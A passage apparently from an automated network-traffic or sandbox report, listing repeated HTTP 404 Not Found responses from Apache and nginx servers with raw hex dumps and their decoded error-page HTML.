5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 10:35:21 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 10:35:24 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 10:35:27 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 10:35:29 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 10:35:35 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 10:35:38 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 10:35:40 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 10:35:43 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 07 Oct 2024 10:36:10 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 07 Oct 2024 10:36:13 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 07 Oct 2024 10:36:15 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 07 Oct 2024 10:36:18 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 